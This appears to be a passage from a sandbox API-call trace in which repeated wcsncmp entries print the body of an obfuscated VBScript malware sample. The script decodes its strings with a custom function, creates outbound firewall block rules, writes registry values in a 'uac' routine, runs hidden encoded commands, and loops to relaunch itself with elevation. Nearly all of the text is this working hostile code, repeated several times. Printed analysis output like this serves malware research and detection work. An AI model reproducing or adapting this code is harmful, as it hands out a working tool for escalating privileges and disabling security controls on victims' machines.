(InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0226.304] wcsncmp (_String1="\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.304] wcsncmp (_String1="\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.304] wcsncmp (_String1="\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0226.304] wcsncmp (_String1="sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 